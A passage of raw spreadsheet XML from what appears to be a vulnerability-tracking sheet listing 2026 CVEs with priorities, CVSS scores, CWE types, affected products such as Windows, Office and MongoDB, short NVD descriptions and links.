microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t></is></c><c r="L1016" s="5" t="inlineStr" /><c r="M1016" s="5" t="inlineStr" /><c r="N1016" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1016" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1016" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1016" s="5" t="inlineStr" /><c r="R1016" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1016" s="5" t="inlineStr"><is><t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1016" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t></is></c></row><row r="1017"><c r="A1017" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1017" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1017" s="5" t="inlineStr"><is><t>CVE-2026-77905</t></is></c><c r="D1017" s="5" t="n"><v>7</v></c><c r="E1017" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1017" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1017" s="5" t="inlineStr" /><c r="H1017" s="5" t="n"><v>0.002</v></c><c r="I1017" s="5" t="inlineStr" /><c r="J1017" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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7" s="5" t="inlineStr" /><c r="M1017" s="5" t="inlineStr" /><c r="N1017" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1017" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1017" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1017" s="5" t="inlineStr" /><c r="R1017" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1017" s="5" t="inlineStr"><is><t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1017" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t></is></c></row><row r="1018"><c r="A1018" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1018" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1018" s="5" t="inlineStr"><is><t>CVE-2026-78457</t></is></c><c r="D1018" s="5" t="n"><v>7</v></c><c r="E1018" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1018" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1018" s="5" t="inlineStr" /><c r="H1018" s="5" t="n"><v>0.002</v></c><c r="I1018" s="5" t="inlineStr" /><c r="J1018" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1018" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1018" s="5" t="inlineStr" /><c r="M1018" s="5" t="inlineStr" /><c r="N1018" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1018" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1018" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1018" s="5" t="inlineStr" /><c r="R1018" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1018" s="5" t="inlineStr"><is><t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1018" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t></is></c></row><row r="1019"><c r="A1019" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1019" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1019" s="5" t="inlineStr"><is><t>CVE-2026-78464</t></is></c><c r="D1019" s="5" t="n"><v>7</v></c><c r="E1019" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1019" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1019" s="5" t="inlineStr" /><c r="H1019" s="5" t="n"><v>0.002</v></c><c r="I1019" s="5" t="inlineStr" /><c r="J1019" s="5" t="inlineStr" /><c r="K1019" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1019" s="5" t="inlineStr" /><c r="M1019" s="5" t="inlineStr" /><c r="N1019" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1019" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1019" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1019" s="5" t="inlineStr" /><c r="R1019" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S1019" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T1019" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t></is></c></row><row r="1020"><c r="A1020" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1020" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1020" s="5" t="inlineStr"><is><t>CVE-2026-80093</t></is></c><c r="D1020" s="5" t="n"><v>7</v></c><c r="E1020" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1020" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1020" s="5" t="inlineStr" /><c r="H1020" s="5" t="n"><v>0.003</v></c><c r="I1020" s="5" t="inlineStr" /><c r="J1020" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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20" s="5" t="inlineStr" /><c r="M1020" s="5" t="inlineStr" /><c r="N1020" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1020" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1020" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1020" s="5" t="inlineStr" /><c r="R1020" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1020" s="5" t="inlineStr"><is><t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1020" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t></is></c></row><row r="1021"><c r="A1021" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1021" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1021" s="5" t="inlineStr"><is><t>CVE-2026-81192</t></is></c><c r="D1021" s="5" t="n"><v>7</v></c><c r="E1021" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1021" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1021" s="5" t="inlineStr" /><c r="H1021" s="5" t="n"><v>0.001</v></c><c r="I1021" s="5" t="inlineStr" /><c r="J1021" s="5" t="inlineStr" /><c r="K1021" s="5" t="inlineStr" /><c r="L1021" s="5" t="inlineStr" /><c r="M1021" s="5" t="inlineStr" /><c r="N1021" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1021" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1021" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1021" s="5" t="inlineStr" /><c r="R1021" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S1021" s="5" t="inlineStr"><is><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is></c><c r="T1021" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t></is></c></row><row r="1022"><c r="A1022" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1022" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1022" s="5" t="inlineStr"><is><t>CVE-2026-81389</t></is></c><c r="D1022" s="5" t="n"><v>7</v></c><c r="E1022" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1022" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1022" s="5" t="inlineStr" /><c r="H1022" s="5" t="n"><v>0.004</v></c><c r="I1022" s="5" t="inlineStr" /><c r="J1022" s="5" t="inlineStr" /><c r="K1022" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1022" s="5" t="inlineStr" /><c r="M1022" s="5" t="inlineStr" /><c r="N1022" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1022" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1022" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1022" s="5" t="inlineStr" /><c r="R1022" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1022" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T1022" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t></is></c></row><row r="1023"><c r="A1023" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1023" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1023" s="5" t="inlineStr"><is><t>CVE-2026-82062</t></is></c><c r="D1023" s="5" t="n"><v>7</v></c><c r="E1023" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1023" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1023" s="5" t="inlineStr" /><c r="H1023" s="5" t="n"><v>0.004</v></c><c r="I1023" s="5" t="inlineStr" /><c r="J1023" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1023" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1023" s="5" t="inlineStr" /><c r="M1023" s="5" t="inlineStr" /><c r="N1023" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1023" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1023" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1023" s="5" t="inlineStr" /><c r="R1023" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1023" s="5" t="inlineStr"><is><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is></c><c r="T1023" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t></is></c></row><row r="1024"><c r="A1024" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1024" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1024" s="5" t="inlineStr"><is><t>CVE-2026-83940</t></is></c><c r="D1024" s="5" t="n"><v>7</v></c><c r="E1024" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1024" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1024" s="5" t="inlineStr" /><c r="H1024" s="5" t="n"><v>0.002</v></c><c r="I1024" s="5" t="inlineStr" /><c r="J1024" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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4" s="5" t="inlineStr" /><c r="M1024" s="5" t="inlineStr" /><c r="N1024" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1024" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1024" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1024" s="5" t="inlineStr" /><c r="R1024" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1024" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1024" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t></is></c></row><row r="1025"><c r="A1025" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1025" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1025" s="5" t="inlineStr"><is><t>CVE-2026-83999</t></is></c><c r="D1025" s="5" t="n"><v>7</v></c><c r="E1025" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1025" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1025" s="5" t="inlineStr" /><c r="H1025" s="5" t="n"><v>0.002</v></c><c r="I1025" s="5" t="inlineStr" /><c r="J1025" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1025" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1025" s="5" t="inlineStr" /><c r="M1025" s="5" t="inlineStr" /><c r="N1025" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1025" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1025" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1025" s="5" t="inlineStr" /><c r="R1025" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1025" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1025" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t></is></c></row><row r="1026"><c r="A1026" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1026" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1026" s="5" t="inlineStr"><is><t>CVE-2026-85360</t></is></c><c r="D1026" s="5" t="n"><v>7</v></c><c r="E1026" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1026" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1026" s="5" t="inlineStr" /><c r="H1026" s="5" t="n"><v>0.002</v></c><c r="I1026" s="5" t="inlineStr" /><c r="J1026" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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26" s="5" t="inlineStr" /><c r="M1026" s="5" t="inlineStr" /><c r="N1026" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1026" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1026" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1026" s="5" t="inlineStr" /><c r="R1026" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1026" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1026" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t></is></c></row><row r="1027"><c r="A1027" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1027" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1027" s="5" t="inlineStr"><is><t>CVE-2026-86135</t></is></c><c r="D1027" s="5" t="n"><v>7</v></c><c r="E1027" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1027" s="5" t="inlineStr"><is><t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t></is></c><c r="G1027" s="5" t="inlineStr" /><c r="H1027" s="5" t="n"><v>0.002</v></c><c r="I1027" s="5" t="inlineStr" /><c r="J1027" s="5" t="inlineStr" /><c r="K1027" s="5" t="inlineStr" /><c r="L1027" s="5" t="inlineStr" /><c r="M1027" s="5" t="inlineStr" /><c r="N1027" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1027" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1027" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1027" s="5" t="inlineStr" /><c r="R1027" s="5" t="inlineStr"><is><t>CWE-352, CWE-400</t></is></c><c r="S1027" s="5" t="inlineStr"><is><t>A Cross-Site Request Forgery (CSRF) vulnerability in WatchGuard Dimension's database snapshot creation feature allows a remote attacker to trigger unauthorized snapshot creation by tricking an authenticated administrator into visiting a specially crafted web page.</t></is></c><c r="T1027" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86135</t></is></c></row><row r="1028"><c r="A1028" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1028" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1028" s="5" t="inlineStr"><is><t>CVE-2026-53933</t></is></c><c r="D1028" s="5" t="n"><v>6.9</v></c><c r="E1028" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1028" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1028" s="5" t="inlineStr" /><c r="H1028" s="5" t="n"><v>0.003</v></c><c r="I1028" s="5" t="inlineStr" /><c r="J1028" s="5" t="inlineStr" /><c r="K1028" s="5" t="inlineStr" /><c r="L1028" s="5" t="inlineStr" /><c r="M1028" s="5" t="inlineStr" /><c r="N1028" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1028" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1028" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1028" s="5" t="inlineStr" /><c r="R1028" s="5" t="inlineStr"><is><t>CWE-203</t></is></c><c r="S1028" s="5" t="inlineStr"><is><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is></c><c r="T1028" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53933</t></is></c></row><row r="1029"><c r="A1029" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1029" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1029" s="5" t="inlineStr"><is><t>CVE-2026-62652</t></is></c><c r="D1029" s="5" t="n"><v>6.9</v></c><c r="E1029" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1029" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G1029" s="5" t="inlineStr" /><c r="H1029" s="5" t="n"><v>0.002</v></c><c r="I1029" s="5" t="inlineStr" /><c r="J1029" s="5" t="inlineStr" /><c r="K1029" s="5" t="inlineStr" /><c r="L1029" s="5" t="inlineStr" /><c r="M1029" s="5" t="inlineStr" /><c r="N1029" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1029" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1029" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1029" s="5" t="inlineStr" /><c r="R1029" s="5" t="inlineStr"><is><t>CWE-215</t></is></c><c r="S1029" s="5" t="inlineStr"><is><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is></c><c r="T1029" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62652</t></is></c></row><row r="1030"><c r="A1030" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1030" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1030" s="5" t="inlineStr"><is><t>CVE-2026-81531</t></is></c><c r="D1030" s="5" t="n"><v>6.9</v></c><c r="E1030" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1030" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G1030" s="5" t="inlineStr" /><c r="H1030" s="5" t="n"><v>0.004</v></c><c r="I1030" s="5" t="inlineStr" /><c r="J1030" s="5" t="inlineStr" /><c r="K1030" s="5" t="inlineStr" /><c r="L1030" s="5" t="inlineStr" /><c r="M1030" s="5" t="inlineStr" /><c r="N1030" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1030" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1030" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1030" s="5" t="inlineStr" /><c r="R1030" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="S1030" s="5" t="inlineStr"><is><t>An information
disclosure vulnerability has been identified in Omada Controller.  An API endpoint intended for Controller initialization
remains accessible after completion and may disclose account-related
information to unauthenticated remote users. 






Successful
exploitation may allow an attacker to remote query the affected endpoint that
may facilitate user enumeration and subsequent attacks targeting administrative
accounts.</t></is></c><c r="T1030" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81531</t></is></c></row><row r="1031"><c r="A1031" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1031" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1031" s="5" t="inlineStr"><is><t>CVE-2026-81823</t></is></c><c r="D1031" s="5" t="n"><v>6.9</v></c><c r="E1031" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1031" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G1031" s="5" t="inlineStr" /><c r="H1031" s="5" t="n"><v>0.002</v></c><c r="I1031" s="5" t="inlineStr" /><c r="J1031" s="5" t="inlineStr" /><c r="K1031" s="5" t="inlineStr" /><c r="L1031" s="5" t="inlineStr" /><c r="M1031" s="5" t="inlineStr" /><c r="N1031" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1031" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1031" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1031" s="5" t="inlineStr" /><c r="R1031" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1031" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow an unauthenticated miscreant to perform read operations intended only for PIMBoards users, resulting in information disclosure. Write operations are not impacted.</t></is></c><c r="T1031" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81823</t></is></c></row><row r="1032"><c r="A1032" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1032" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1032" s="5" t="inlineStr"><is><t>CVE-2026-86804</t></is></c><c r="D1032" s="5" t="n"><v>6.9</v></c><c r="E1032" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1032" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1032" s="5" t="inlineStr" /><c r="H1032" s="5" t="n"><v>0.004</v></c><c r="I1032" s="5" t="inlineStr" /><c r="J1032" s="5" t="inlineStr" /><c r="K1032" s="5" t="inlineStr" /><c r="L1032" s="5" t="inlineStr" /><c r="M1032" s="5" t="inlineStr" /><c r="N1032" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1032" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1032" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1032" s="5" t="inlineStr" /><c r="R1032" s="5" t="inlineStr"><is><t>CWE-266, CWE-285</t></is></c><c r="S1032" s="5" t="inlineStr"><is><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is></c><c r="T1032" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86804</t></is></c></row><row r="1033"><c r="A1033" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1033" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1033" s="5" t="inlineStr"><is><t>CVE-2026-86810</t></is></c><c r="D1033" s="5" t="n"><v>6.9</v></c><c r="E1033" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1033" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1033" s="5" t="inlineStr" /><c r="H1033" s="5" t="n"><v>0.007</v></c><c r="I1033" s="5" t="inlineStr" /><c r="J1033" s="5" t="inlineStr" /><c r="K1033" s="5" t="inlineStr" /><c r="L1033" s="5" t="inlineStr" /><c r="M1033" s="5" t="inlineStr" /><c r="N1033" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1033" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1033" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1033" s="5" t="inlineStr" /><c r="R1033" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1033" s="5" t="inlineStr"><is><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is></c><c r="T1033" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86810</t></is></c></row><row r="1034"><c r="A1034" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1034" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1034" s="5" t="inlineStr"><is><t>CVE-2026-65812</t></is></c><c r="D1034" s="5" t="n"><v>6.8</v></c><c r="E1034" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1034" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1034" s="5" t="inlineStr" /><c r="H1034" s="5" t="n"><v>0.005</v></c><c r="I1034" s="5" t="inlineStr" /><c r="J1034" s="5" t="inlineStr" /><c r="K1034" s="5" t="inlineStr" /><c r="L1034" s="5" t="inlineStr" /><c r="M1034" s="5" t="inlineStr" /><c r="N1034" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1034" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1034" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1034" s="5" t="inlineStr" /><c r="R1034" s="5" t="inlineStr"><is><t>CWE-201</t></is></c><c r="S1034" s="5" t="inlineStr"><is><t>Insertion of sensitive information into sent data in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1034" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65812</t></is></c></row><row r="1035"><c r="A1035" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1035" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1035" s="5" t="inlineStr"><is><t>CVE-2026-68833</t></is></c><c r="D1035" s="5" t="n"><v>6.8</v></c><c r="E1035" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1035" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1035" s="5" t="inlineStr" /><c r="H1035" s="5" t="n"><v>0.003</v></c><c r="I1035" s="5" t="inlineStr" /><c r="J1035" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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5" s="5" t="inlineStr" /><c r="M1035" s="5" t="inlineStr" /><c r="N1035" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1035" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1035" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1035" s="5" t="inlineStr" /><c r="R1035" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1035" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1035" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68833</t></is></c></row><row r="1036"><c r="A1036" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1036" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1036" s="5" t="inlineStr"><is><t>CVE-2026-69415</t></is></c><c r="D1036" s="5" t="n"><v>6.8</v></c><c r="E1036" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1036" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1036" s="5" t="inlineStr" /><c r="H1036" s="5" t="n"><v>0.007</v></c><c r="I1036" s="5" t="inlineStr" /><c r="J1036" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1036" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1036" s="5" t="inlineStr" /><c r="M1036" s="5" t="inlineStr" /><c r="N1036" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1036" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1036" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1036" s="5" t="inlineStr" /><c r="R1036" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1036" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T1036" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t></is></c></row><row r="1037"><c r="A1037" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1037" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1037" s="5" t="inlineStr"><is><t>CVE-2026-69490</t></is></c><c r="D1037" s="5" t="n"><v>6.8</v></c><c r="E1037" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1037" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1037" s="5" t="inlineStr" /><c r="H1037" s="5" t="n"><v>0.004</v></c><c r="I1037" s="5" t="inlineStr" /><c r="J1037" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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7" s="5" t="inlineStr" /><c r="M1037" s="5" t="inlineStr" /><c r="N1037" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1037" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1037" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1037" s="5" t="inlineStr" /><c r="R1037" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1037" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1037" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t></is></c></row><row r="1038"><c r="A1038" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1038" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1038" s="5" t="inlineStr"><is><t>CVE-2026-69566</t></is></c><c r="D1038" s="5" t="n"><v>6.8</v></c><c r="E1038" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1038" s="5" 